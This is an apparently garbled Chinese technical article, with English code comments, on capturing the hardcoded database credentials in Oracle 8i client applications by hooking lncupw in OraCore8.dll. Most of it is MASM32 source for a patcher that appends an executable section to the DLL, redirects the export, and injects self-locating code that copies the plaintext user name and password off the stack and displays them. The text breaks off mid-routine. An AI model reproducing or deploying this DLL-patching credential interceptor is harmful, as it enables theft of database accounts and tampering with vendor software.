´ó²¿·ÖµÄ·þÎñÆ÷/¿Í»§¶ËϵͳµÄ½á¹¹¿ÉÒÔÕâÑùÃèÊö£º
¿Í»§¶Ë <---(1)---> ϵͳTCP/IPÄ£¿é <---(2)---> ÍøÂç <----> ϵͳµÄTCP/IPÄ£¿é <----> ·þÎñ¶Ë
¶ÔÓÚÕâЩϵͳ£¬Ò»°ãµÄ°²È«ÎÊÌâ³öÔÚÓÉ(2)ËùʾµÄµØ·½£¬±ÈÈç˵µ±Ê¹Óà POP3 ÐÒéÊÕÈ¡Óʼþ£¬»òÕßÓà Telnet µÇ¼µ½Ô¶³ÌÖ÷»úµÄʱºò£¬ÆäµÇ¼ÃÜÂë¶¼ÊÇδ¾¼ÓÃܵģ¬Ö»ÒªÔÚÍøÂçÉϰ²×°Ò»¸öÐá̽Æ÷ (Sniffer) À´¼àÌýÊý¾Ý°ü£¬¾Í¿ÉÒÔºÜÈÝÒ׵ؽػñÓû§ÃûºÍÃÜÂë¡£
µ«¶ÔÓÚ Oracle ϵͳÀ´Ëµ£¬Óû§ÃûºÍÃÜÂëÔÚÍøÂçÉÏ´«µÝ֮ǰ£¬ÊǾ¹ý¼ÓÃܵ쬶øÇÒ¼ÓÃܵÄËã·¨ÊDz»¿ÉÄæµÄ£¬¼´Ê¹Ê¹ÓÃÐá̽Æ÷̽Ìýµ½Êý¾Ý°ü£¬¿ªÊ¼ÎÞ·¨°ÑÊý¾Ý¿âµÄÁ¬½ÓÃÜÂë»Ö¸´³öÀ´£¬Oracle ϵͳµÄ½á¹¹¿ÉÒÔÈçÏÂÃèÊö£º
¿Í»§¶ËÓ¦ÓóÌÐò <--(1)--> Oracle¿Í»§¶ËÈí¼þ <---(2)---> ϵͳTCP/IPÄ£¿é <---(3)---> ÍøÂç <--> ϵͳµÄTCP/IPÄ£¿é <---> OracleÊý¾Ý¿â
¶ÔÓÚÕâÒ»Ààϵͳ£¬ËùÓÐÔÚ(2)»òÕß(3)´¦¼àÌýµ½µÄµÇ¼Êý¾Ý°ü¶¼ÊÇÒѾ¾¹ý¼ÓÃܵ쬵«ÊÇ£¬¿¼ÂÇÒ»ÏÂÎÒÃDZàд Oracle Êý¾Ý¿âÓ¦ÓóÌÐòµÄʱºò£¬ÎÞÂÛÊÇͨ¹ý ODBC »¹ÊÇ Pro C£¬»òÕ߯äËûµÄ BDE »·¾³µÈ£¬¶¼Êǽ«Êý¾Ý¿âÁ¬½ÓµÄÓû§ÃûºÍÃÜÂëÓÃÃ÷Îĵķ½Ê½´«µÝ¸ø Oracle ¿Í»§¶ËÇý¶¯³ÌÐòµÄ£¬ËùÒÔÔÚ(1)λÖõÄÊý¾ÝÁ÷¿Ï¶¨Ã÷Îĵģ¬ÃÜÂëÊÇÔÚ Oracle ¿Í»§¶ËÈí¼þÖб»¼ÓÃܺó²Å¾¹ý(2)¡¢(3)µÈ²½Öè·¢ËͳöÈ¥£¬Èç¹ûÔÚ(1)µÄλÖýøÐÐÀ¹½Ø£¬¾Í¿ÉÄÜÀ¹½Øµ½ÃÜÂë¡£
¿¼Âǵ½²½Öè(1)·¢ÉúÔÚÓ¦ÓóÌÐòµ½ Oracle ϵͳµÄµ÷ÓÃÖУ¬Ò²¾ÍÊÇ·¢ÉúÔÚ API µ÷ÓõIJã´Î£¬ËùÒÔÖ»ÒªÕÒµ½ÃÜÂë¼ÓÃÜÄ£¿éµÄÈë¿Ú£¬ÔÚ¶ÔÏàÓ¦µÄ API ½øÐÐ Hook£¬¾ÍÄܽػñµ½ÃÜÂëÁË¡£
ÓÐÈË¿ÉÄÜ´æÔÚÒ»¸öÒÉÎÊ£ºÊ¹Óà Sniffer ¿ÉÒÔ¼àÌýµ½ÍøÂçÉÏÆäËû¼ÆËã»úµÄÁ¬½ÓÊý¾Ý°ü£¬¶øÔÚ API ²ã´ÎÉϽøÐÐÀ¹½ØÊÇÕë¶Ô±¾»úµÄ£¬µ«ÒªÊÇ×Ô¼ºÄܹ»ÔÚ±¾»úÉÏÁ¬½Ó£¬¾Í±íʾÒѾ֪µÀÃÜÂëÁË£¬ÔÙÈ¥½Ø»ñ²»ÊǶà´ËÒ»¾ÙÂð£¿
·ÇÒ²£¡
ʵ¼ÊÉÏ´ó²¿·ÖµÄ Oracle Ó¦ÓóÌÐò¶¼°üÀ¨Ò»¸öÓû§¿ª·¢µÄ¿Í»§¶Ë£¬Õâ¸ö¿Í»§¶Ë¿ÉÄÜÊÇÓà C¡¢PowerBuilder ºÍÆäËûÓïÑÔ¿ª·¢µÄ£¬ÕâЩÈí¼þÌṩһ¸ö½çÃæÌáʾÓû§ÊäÈëÓû§ÃûºÍÃÜÂëµÇ¼ϵͳ£¬µ«ÊÇÕâ¸öÓû§ÃûºÍÃÜÂë²¢²»ÊÇÊý¾Ý¿âµÄÁ¬½ÓÓû§ÃûºÍÃÜÂ룬¶ø½ö½öÊÇÒ»¸öÀàËÆÓÚ users ±íÖеÄÒ»Ìõ¼Ç¼¶øÒÑ£¬¶ø³ÌÐòÄÚ²¿ÄÚÖõÄÊý¾Ý¿âÁ¬½ÓÕʺŲÅÊÇÎÒÃǵÄÄ¿±ê£¬Ò»°ãÀ´Ëµ£¬¿Í»§¶ËÓ¦ÓóÌÐòÊÇÕâÑù¹¤×÷µÄ£º
1. ʹÓÃÒ»¸öÄÚÖõÄÊý¾Ý¿âÁ¬½ÓÕʺÅÁ¬½Óµ½Êý¾Ý¿â¡£
2. µ¯³öÒ»¸ö¶Ô»°¿òÌáʾÓû§ÊäÈëÓû§Ãû xxx ºÍÃÜÂë yyy
3. ʹÓÃÀàËÆÓÚ select * from users where username='xxx' and password='yyy' Ò»ÀàµÄ SQL Óï¾ä²éѯÓû§ÊÇ·ñÓÐȨµÇ¼ϵͳ¡£
ÎÒÃǵÄÄ¿±ê¾ÍÊDz½Öè1ÖеÄÁ¬½ÓÕʺţ¬Õâ¸öÕʺŴæÔÚÓÚ¿Í»§¶ËÈí¼þÖУ¬ËäÈ»¿ÉÄÜÒѾ±»¾²Ì¬¼ÓÃÜ£¨Ò²¾ÍÊÇ˵ÓÃ16½øÖÆÈí¼þÈ¥ËÑѰ¿ÉÖ´ÐÐÎļþʱ²¢²»Äܱ»ÕÒµ½£©£¬µ«ËüÔËÐкóÐèÒªÁ¬½ÓÊý¾Ý¿âµÄʱºò±ØÈ»»á±»½âÃܲ¢ÓÃÃ÷ÎÄ´«µÝµ½ Oracle ¿Í»§¶ËÈí¼þÖС£
·½·¨
ºÃÁË£¬ÏÖÔÚÀ´¿´¿´¾ßÌåµÄʵÏÖ·½·¨¡£
1. Ïà¹ØµÄµ÷ÓÃ
µÚÒ»²½µ±È»ÒªÖªµÀÔÚÄÄÀïÏÂÊÖ£¬¾¹ýÁËÒ»·¬¸ú×ÙÒÔºó£¨ÕâÀïʡȥ¸ú×ٵIJ½Öè n ²½£¬´ó¼Ò¿ÉÒÔ³¢ÊÔ×Ô¼º¸ú×Ùһϣ©£¬¾Í¿ÉÒÔ·¢ÏÖÓû§ÃûºÍÃÜÂëÊÇÔÚ OraCore8.dll Ä£¿éÖÐµÄ lncupw º¯ÊýÖб»¼ÓÃܵ쬶øÇÒÕâ¸öº¯ÊýµÄµ÷Ó÷½·¨ÈçÏ£º
invoke lncupw,addr Output,1eh,addr szPassword,dwLenPass,addr szUserName,dwLenName,NULL,1
º¯ÊýµÄÈë¿Ú²ÎÊý°üÀ¨Ã÷ÎĵÄÊý¾Ý¿âÁ¬½ÓÓû§ÃûºÍÃÜÂ룬ÒÔ¼°ËûÃǵij¤¶È£¬ÔËÐеĽá¹ûÊÇÔÚµÚÒ»¸ö²ÎÊýOutputÖ¸¶¨µÄ»º³åÇøÖзµ»Ø¼ÓÃܺóµÄÊý¾Ý£¬ÒÔºóÕâ¸ö¼ÓÃܺóµÄÊý¾Ý»á±»·¢Ë͵½·þÎñÆ÷¶Ë½øÐÐÈÏÖ¤¡£
2. ¾ßÌåµÄʵÏÖ·½°¸
ÎÒÃǵķ½·¨¾ÍÊÇÔÚ¶Ô OraCore8.dll ½øÐв¹¶¡£¬ÔÚ dll ÎļþÖи½¼ÓÒ»¶Î´úÂ룬ȻºóÐÞ¸Ä dll µÄµ¼³ö±íÖÐ lncupw º¯Êý¶ÔÓ¦µÄÈë¿ÚµØÖ·£¬½«ËüÖ¸Ïòµ½¸½¼ÓµÄ´úÂëÖУ¬È»ºóÓÉÕâ¶Î´úÂëÔÚ¶ÑÕ»ÖÐÈ¡³öÓû§ÃûºÍÃÜÂë²¢ÏÔʾ³öÀ´£¬Íê³ÉÕâ¸ö²½ÖèºóÔÙÌø×ªµ½ÔʼµÄ lncupw º¯ÊýµÄÈë¿ÚµØÖ·È¥Ö´ÐÐÔÓеŦÄÜ¡£
Õâ¸ö·½°¸Éæ¼°µ½Á½¸ö¼¼ÊõÎÊÌ⣬µÚÒ»ÊÇ¶Ô dll ÎļþµÄÐÞ¸ÄÎÊÌ⣬Õâ¸öÎÊÌâ¿ÉÒÔ¹é½áΪÔÚ PE ÎļþºóÌí¼Ó¿ÉÖ´ÐдúÂëµÄ·½·¨ÎÊÌ⣬µÚ¶þ¾ÍÊÇд±»¸½¼Óµ½ dll ÎļþºóµÄ³ÌÐòÌåµÄÎÊÌâ¡£
¶Ô dll ÎļþµÄÐ޸ĴúÂëµÄƬ¶ÏÈçÏ£¬ÔÚÕâÒÔǰ£¬ÎÒÃǼٶ¨ÒѾ×öÁËÆäËûÕâÑùһЩ¹¤×÷£º
¡ù ÎļþÃû×Ö·û´®·ÅÔÚ szFileName Ö¸¶¨µÄ»º³åÇøÖС£
¡ù ÒѾ¶ÔÎļþ½øÐÐУÑ飬ÕÒµ½Á˵¼³ö±íÖÐµÄ lncupw ÏîÄ¿£¬Õâ¸öÏîÄ¿ÔÚÎļþÖÐµÄ Offset ·ÅÔÚ dwOffsetPeHeand ÖУ¬lncupw µÄÔʼÈë¿ÚRVA·ÅÔÚ dwProcEntry ±äÁ¿ÖС£
¡ù ÕÒ³öÁË dll ÎļþÖÐµÄ PE ÎļþͷλÖ㬲¢¿½±´ PE ÎļþÍ·µ½ lpPeHead Ö¸¶¨µÄλÖÃÖС£
;--------------------------------------------------------------------
; Patcher fragment (MASM32 / Win32). Appends the APPEND_CODE block to the
; target DLL as one extra section and rewrites the lncupw export entry so
; that it points into that section.
; Preconditions (established by code outside this excerpt):
;   szFileName     - path of the DLL being modified
;   lpPeHead       - in-memory copy of IMAGE_NT_HEADERS + section table
;   dwOffsetPeHead - file offset of that PE header
;   dwOffsetProc   - file offset of the lncupw slot in the export address table
;   dwProcEntry    - original RVA of lncupw (overwritten below)
; Locals: @hFile, @dwTemp. Clobbers eax, ebx, ecx, edx, esi, edi.
; Review notes:
;   - No SetFilePointer/WriteFile result is checked; a failed or partial
;     write leaves the file half-patched.
;   - There is no check that the header area (SizeOfHeaders) has room for
;     one more IMAGE_SECTION_HEADER before it is written back.
;   - SetEndOfFile truncates anything stored after the last section.
;   - OptionalHeader.CheckSum is not recomputed and no signature is touched,
;     so file-integrity verification of the DLL flags the modification.
;--------------------------------------------------------------------
invoke CreateFile,addr szFileName,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or \
FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
.if eax == INVALID_HANDLE_VALUE
invoke MessageBox,hWinMain,addr szErrModify,NULL,MB_OK or MB_ICONERROR
jmp _Ret
.endif
mov @hFile,eax
;********************************************************************
; esi --> copy of the original PE header
; edx --> last existing section header, ebx --> slot for the new header
;********************************************************************
mov esi,lpPeHead
assume esi:ptr IMAGE_NT_HEADERS
movzx eax,[esi].FileHeader.NumberOfSections
dec eax                                 ; index of the last section
mov ecx,sizeof IMAGE_SECTION_HEADER
mul ecx                                 ; eax = index * sizeof header (edx clobbered, reloaded next)
mov edx,esi
add edx,eax
add edx,sizeof IMAGE_NT_HEADERS         ; edx = &sectionTable[last]
mov ebx,edx
add ebx,sizeof IMAGE_SECTION_HEADER     ; ebx = &sectionTable[last+1]
assume ebx:ptr IMAGE_SECTION_HEADER,edx:ptr IMAGE_SECTION_HEADER
;********************************************************************
; Add one section and fix the PE header fields that depend on it
;********************************************************************
inc [esi].FileHeader.NumberOfSections
mov eax,[edx].PointerToRawData
add eax,[edx].SizeOfRawData
mov [ebx].PointerToRawData,eax          ; raw data immediately after the last section
invoke _Align,offset APPEND_CODE_END-offset APPEND_CODE,[esi].OptionalHeader.FileAlignment
mov [ebx].SizeOfRawData,eax
invoke _Align,offset APPEND_CODE_END-offset APPEND_CODE,[esi].OptionalHeader.SectionAlignment
add [esi].OptionalHeader.SizeOfCode,eax ; fix SizeOfCode
add [esi].OptionalHeader.SizeOfImage,eax ; fix SizeOfImage
invoke _Align,[edx].Misc.VirtualSize,[esi].OptionalHeader.SectionAlignment
add eax,[edx].VirtualAddress
mov [ebx].VirtualAddress,eax            ; first section-aligned RVA after the last section
mov [ebx].Misc.VirtualSize,offset APPEND_CODE_END-offset APPEND_CODE
; Code, resolved API pointers and scratch buffers all live in this one
; section, so it is marked readable, writable AND executable. An RWX
; section appended to a vendor DLL is a strong integrity-monitoring signal.
mov [ebx].Characteristics,IMAGE_SCN_CNT_CODE\
or IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
invoke lstrcpy,addr [ebx].Name1,addr szMySection
;********************************************************************
; Write the file: updated headers, then the appended block
;********************************************************************
invoke SetFilePointer,@hFile,dwOffsetPeHead,NULL,FILE_BEGIN
invoke WriteFile,@hFile,esi,[esi].OptionalHeader.SizeOfHeaders,\
addr @dwTemp,NULL
invoke SetFilePointer,@hFile,[ebx].PointerToRawData,NULL,FILE_BEGIN
invoke WriteFile,@hFile,offset APPEND_CODE,[ebx].Misc.VirtualSize,\
addr @dwTemp,NULL
mov eax,[ebx].PointerToRawData
add eax,[ebx].SizeOfRawData
invoke SetFilePointer,@hFile,eax,NULL,FILE_BEGIN
invoke SetEndOfFile,@hFile              ; file now ends exactly at the new section
;********************************************************************
; Patch the rel32 of the "jmp oldEntry" that ends the appended code:
; rel32 = oldEntryRVA - (RVA of the dword at _dwOldEntry + 4)
;********************************************************************
mov eax,[ebx].VirtualAddress
add eax,(offset _dwOldEntry-offset APPEND_CODE+4)
sub dwProcEntry,eax
mov ecx,[ebx].PointerToRawData
add ecx,(offset _dwOldEntry-offset APPEND_CODE)
invoke SetFilePointer,@hFile,ecx,NULL,FILE_BEGIN
invoke WriteFile,@hFile,addr dwProcEntry,4,addr @dwTemp,NULL
;********************************************************************
; Redirect the export: the lncupw slot in the export address table now
; holds the RVA of _NewEntry inside the new section
;********************************************************************
mov eax,[ebx].VirtualAddress
add eax,(offset _NewEntry-offset APPEND_CODE)
mov dwProcEntry,eax
invoke SetFilePointer,@hFile,dwOffsetProc,NULL,FILE_BEGIN
invoke WriteFile,@hFile,addr dwProcEntry,4,addr @dwTemp,NULL
;********************************************************************
; Close the file
;********************************************************************
invoke CloseHandle,@hFile
_Ret:
; patching finished
Õâ¶Î´úÂëÍê³ÉÁË3¸ö²½Ö裬Ê×ÏÈÊÇɨÃèPEÎļþÍ·ÖÐµÄ½Ú±í£¬²¢ÔÚ×îºóÌí¼ÓÒ»¸öеĽڣ¬ÒÔ±ã°Ñ¸½¼ÓµÄ´úÂëдµ½Õâ¸ö½ÚÖУ¬Õâ¸ö½ÚµÄÊôÐÔ±»ÉèÖÃΪ¿ÉÖ´ÐС¢¿É¶Á¡¢¿Éд£¬ÒòΪ´úÂëÔËÐÐÐèÒªµÄÊý¾ÝÇøÒ²·ÅÔÚÕâÀȻºó³ÌÐòÐ޸ĸ½¼Ó´úÂë×îºóµÄ jmp Ö¸Á½«ËüÖ¸µ½ÔʼµÄ lncupw º¯ÊýÖС£×îºó³ÌÐòÔÚ dll µÄµ¼³ö±íÖн« lncupw º¯ÊýµÄÈë¿ÚµØÖ·Ö¸Ïò¸½¼Ó´úÂëÖС£
ÏÂÃæÊDZ»¸½¼Óµ½ dll ºóµÄ´úÂ룬Õâ¶Î´úÂ뱻д³É¿ÉÒÔ×ÔÎÒ¶¨Î»µÄ¸ñʽ£¬´úÂëÊ×ÏÈÔÚÄÚ´æÖÐÕÒ³ö Kernel32.dll µÄλÖò¢´ÓÖÐÕÒ³ö LoadLibrary º¯ÊýºÍ GetProcAddress º¯ÊýµÄµØÖ·£¬È»ºóµ÷ÓÃÕâÁ½¸öº¯Êý»ñÈ¡ÆäËûһϵÁÐÒªÓõ½µÄº¯ÊýµÄÈë¿ÚµØÖ·£º
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Òª±»Ìí¼Óµ½ OraCore8.dll ÎļþºóÃæµÄÖ´ÐдúÂë
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;
;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; һЩº¯ÊýµÄÔÐζ¨Òå
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Prototypes for the APIs the appended block resolves at run time. The
; block locates kernel32 and walks export tables itself (see _GetKernelBase,
; _GetApi, _NewEntry) and then calls through these typed pointers, so
; `invoke` can generate the right argument pushes and stack cleanup.
_ProtoGetProcAddress typedef proto :dword,:dword
_ProtoLoadLibrary typedef proto :dword
_ProtoMessageBox typedef proto :dword,:dword,:dword,:dword
_Protowsprintf typedef proto c :dword,:VARARG   ; `c` = cdecl with varargs; the others are stdcall
_ApiGetProcAddress typedef ptr _ProtoGetProcAddress
_ApiLoadLibrary typedef ptr _ProtoLoadLibrary
_ApiMessageBox typedef ptr _ProtoMessageBox
_Apiwsprintf typedef ptr _Protowsprintf
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;
;
APPEND_CODE equ this byte
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Start of the block copied into the target file. Everything from here to
; APPEND_CODE_END is addressed relative to ebx (the load delta each routine
; computes with call/pop), so the block needs no relocation fixups.
; The variables below are written at run time, which is why the patcher
; gives this section IMAGE_SCN_MEM_WRITE as well as EXECUTE.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
hDllKernel32 dd ?                       ; kernel32 base returned by _GetKernelBase
hDllUser32 dd ?                         ; user32 module handle from LoadLibraryA
_GetProcAddress _ApiGetProcAddress ?    ; resolved API pointers, filled in by _NewEntry
_LoadLibrary _ApiLoadLibrary ?
_MessageBox _ApiMessageBox ?            ; also serves as the "already initialised" flag in _NewEntry
_wsprintf _Apiwsprintf ?
szLoadLibrary db 'LoadLibraryA',0
szGetProcAddress db 'GetProcAddress',0
szUser32 db 'user32',0
szMessageBox db 'MessageBoxA',0
szwsprintf db 'wsprintfA',0
; Caption and wsprintf format (two %s: user name, password). The text is
; GBK-encoded and appears garbled in this copy; bytes are kept as-is.
szCaption db 'Oracle 8i ÃÜÂë½ØÈ¡²¹¶¡',0
szFormatPwd db '½Ø»ñ Oracle Á¬½Ó£º',0dh,0ah,0dh,0ah
db 'Óû§Ãû£º%s',0dh,0ah
db 'ÃÜ Â룺%s',0
; Scratch buffers. _NewEntry copies at most 60 bytes plus a NUL into each of
; the two 64-byte buffers; szTmpBuffer receives the formatted message.
szTmpBuffer db 512 dup (?)
szUserName db 64 dup (?)
szPassWord db 64 dup (?)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ´íÎó Handler
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _SEHHandler - frame-based exception handler used by _GetKernelBase and
; _GetApi. Those routines build this frame on the stack and link it into
; fs:[0]; _lpSEH is the frame address:
;   [_lpSEH]      previous fs:[0]
;   [_lpSEH+4]    address of _SEHHandler
;   [_lpSEH+8]    address to resume at (_PageError / _Error)
;   [_lpSEH+0Ch]  saved ebp
; On an exception it rewrites the faulting CONTEXT so the thread resumes at
; the stored address with esp = frame address and ebp restored, then returns
; ExceptionContinueExecution. The resume code unlinks the frame itself.
; Review notes: _lpExceptionRecord is loaded into esi but never examined,
; so every exception code is handled as "skip and continue", not only the
; access violations the callers expect from probing unmapped memory. Only
; Ebp/Eip/Esp are rewritten; all other registers keep their fault-time values.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_SEHHandler proc _lpExceptionRecord,_lpSEH,_lpContext,_lpDispatcherContext
pushad
mov esi,_lpExceptionRecord
mov edi,_lpContext
assume esi:ptr EXCEPTION_RECORD,edi:ptr CONTEXT
mov eax,_lpSEH
push [eax + 0ch]
pop [edi].regEbp                        ; ebp the caller saved in the frame
push [eax + 8]
pop [edi].regEip                        ; resume label
push eax
pop [edi].regEsp                        ; esp = frame address; frame still linked in fs:[0]
assume esi:nothing,edi:nothing
popad
mov eax,ExceptionContinueExecution
ret
_SEHHandler endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ÔÚÄÚ´æÖÐɨÃè Kernel32.dll µÄ»ùÖ·
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
szKernel32 db 'KERNEL32'                ; no terminator: exactly sizeof szKernel32 (8) bytes are compared
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _GetKernelBase(_dwKernelRet) -> eax = image base of kernel32, or 0
; Scans 64 KiB-aligned addresses downward from (_dwKernelRet and 0FFFF0000h)
; until the address drops below 70000000h, looking for an MZ/PE header whose
; export-directory name starts with 'KERNEL32' (case-sensitive, 8 bytes).
; Touching an unmapped page raises an exception; the SEH frame set up below
; resumes at _PageError, so the scan simply steps to the next block.
; Review notes: the fixed start (7B000000h, passed by _NewEntry) and floor
; (70000000h) assume the kernel32 load range of Windows NT4/2000-era systems.
; On a system where kernel32 is mapped outside that window (e.g. with ASLR)
; nothing matches, 0 is returned and _NewEntry falls through to the original
; lncupw. Registers are preserved via pushad/popad; only eax carries the result.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetKernelBase proc _dwKernelRet
local @dwReturn
pushad
mov @dwReturn,0
;********************************************************************
; Relocation: ebx = (run-time address of @@) - (link-time offset of @@)
;********************************************************************
call @F
@@:
pop ebx
sub ebx,offset @B
;********************************************************************
; Build the SEH frame consumed by _SEHHandler (layout: prev, handler,
; resume address, saved ebp) and link it into fs:[0]
;********************************************************************
assume fs:nothing
push ebp
lea eax,[ebx + offset _PageError]
push eax
lea eax,[ebx + offset _SEHHandler]
push eax
push fs:[0]
mov fs:[0],esp
;********************************************************************
; Probe each 64 KiB boundary for a PE image named KERNEL32
;********************************************************************
mov edi,_dwKernelRet
and edi,0ffff0000h                      ; round down to a 64 KiB boundary
.while TRUE
.if word ptr [edi] == IMAGE_DOS_SIGNATURE
mov esi,edi
add esi,[esi+003ch]                     ; esi = edi + e_lfanew -> PE header
.if word ptr [esi] == IMAGE_NT_SIGNATURE
assume esi:ptr IMAGE_NT_HEADERS
mov esi,[esi].OptionalHeader.DataDirectory.VirtualAddress   ; first entry: export directory RVA
add esi,edi
assume esi:ptr IMAGE_EXPORT_DIRECTORY
mov esi,[esi].nName                     ; RVA of the module's export name
add esi,edi
mov ecx,sizeof szKernel32
push edi
lea edi,[ebx+szKernel32]
cld
repz cmpsb                              ; ZF=1 iff all 8 bytes matched
pop edi
.if ZERO?
mov @dwReturn,edi                       ; edi is the matching image base
.break
.endif
assume esi:nothing
.endif
.endif
_PageError:                             ; also the resume point after a faulting probe
sub edi,010000h
.break .if edi < 70000000h
.endw
pop fs:[0]                              ; unlink the SEH frame
add esp,0ch                             ; drop handler, resume address, saved ebp
popad
mov eax,@dwReturn
ret
_GetKernelBase endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ´ÓÄÚ´æÖÐÄ£¿éµÄµ¼³ö±íÖлñȡij¸ö API µÄÈë¿ÚµØÖ·
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _GetApi(_hModule, _lpszApi) -> eax = address of the named export, or 0
; Walks the module's export name table (AddressOfNames), comparing each name
; with _lpszApi including the terminating NUL, maps the matching index
; through AddressOfNameOrdinals into AddressOfFunctions and returns
; RVA + _hModule. Any fault while reading the tables resumes at _Error
; with @dwReturn still 0.
; Review notes: the name loop is do-while (.repeat/.until), so a module
; with NumberOfNames = 0 still has its first slot read before the test.
; NOTE(review): nothing here distinguishes forwarded exports, whose
; function-table slot does not refer to code in this module.
; Registers are preserved via pushad/popad; only eax carries the result.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetApi proc _hModule,_lpszApi
local @dwReturn,@dwStringLength
pushad
mov @dwReturn,0
;********************************************************************
; Relocation: ebx = load delta (used only for the SEH addresses below;
; ebx is reused as a table cursor later)
;********************************************************************
call @F
@@:
pop ebx
sub ebx,offset @B
;********************************************************************
; Build the SEH frame consumed by _SEHHandler and link it into fs:[0]
;********************************************************************
assume fs:nothing
push ebp
lea eax,[ebx + offset _Error]
push eax
lea eax,[ebx + offset _SEHHandler]
push eax
push fs:[0]
mov fs:[0],esp
;********************************************************************
; @dwStringLength = strlen(_lpszApi) + 1 (the NUL is compared too)
;********************************************************************
mov edi,_lpszApi
mov ecx,-1
xor al,al
cld
repnz scasb                             ; edi stops one past the NUL
mov ecx,edi
sub ecx,_lpszApi
mov @dwStringLength,ecx
;********************************************************************
; esi = export directory (first data-directory entry of the PE header)
;********************************************************************
mov esi,_hModule
add esi,[esi + 3ch]                     ; e_lfanew
assume esi:ptr IMAGE_NT_HEADERS
mov esi,[esi].OptionalHeader.DataDirectory.VirtualAddress
add esi,_hModule
assume esi:ptr IMAGE_EXPORT_DIRECTORY
;********************************************************************
; Search the name table for an exact match
;********************************************************************
mov ebx,[esi].AddressOfNames
add ebx,_hModule                        ; ebx = &names[0] (RVAs, 4 bytes each)
xor edx,edx                             ; edx = index
.repeat
push esi                                ; esi is reused as the compare source
mov edi,[ebx]
add edi,_hModule                        ; edi = current export name
mov esi,_lpszApi
mov ecx,@dwStringLength
repz cmpsb
.if ZERO?
pop esi
jmp @F
.endif
pop esi
add ebx,4
inc edx
.until edx >= [esi].NumberOfNames
jmp _Error                              ; not found: @dwReturn stays 0
@@:
;********************************************************************
; name index --> ordinal --> function address
;********************************************************************
sub ebx,[esi].AddressOfNames
sub ebx,_hModule                        ; ebx = index * 4
shr ebx,1                               ; ebx = index * 2 (ordinals are WORDs)
add ebx,[esi].AddressOfNameOrdinals
add ebx,_hModule
movzx eax,word ptr [ebx]                ; eax = ordinal
shl eax,2                               ; function table entries are DWORDs
add eax,[esi].AddressOfFunctions
add eax,_hModule
;********************************************************************
; Read the RVA from the address table and convert to a VA
;********************************************************************
mov eax,[eax]
add eax,_hModule
mov @dwReturn,eax
_Error:                                 ; normal exit and SEH resume point; esp is the frame address either way
pop fs:[0]
add esp,0ch
assume esi:nothing
popad
mov eax,@dwReturn
ret
_GetApi endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; еÄÈë¿ÚµØÖ·
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _NewEntry - replacement target of the lncupw export. Runs inside the
; Oracle client process each time lncupw is called: on first use it
; resolves the APIs it needs, then it copies the user-name and password
; arguments from the caller's stack, shows them in a MessageBox (which blocks
; the calling thread until dismissed), restores all registers and jumps to
; the original lncupw. Register/flag state is preserved around the whole
; routine by pushad/popad, so the original function sees the caller's state.
; Review notes:
;   - The "already initialised" test checks only _MessageBox, but _wsprintf
;     is stored after it. If resolving wsprintfA fails once, the next call
;     skips initialisation and invokes a NULL _wsprintf pointer.
;   - The length caps use `jle` (signed compare). A length with the sign bit
;     set is not capped, and the copy then overruns the 64-byte buffers.
;   - `cld` is executed only before the first copy; the second relies on
;     DF being unchanged in between (nothing between them modifies it).
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_NewEntry:
;********************************************************************
; Relocate (ebx = load delta) and resolve the APIs on first use
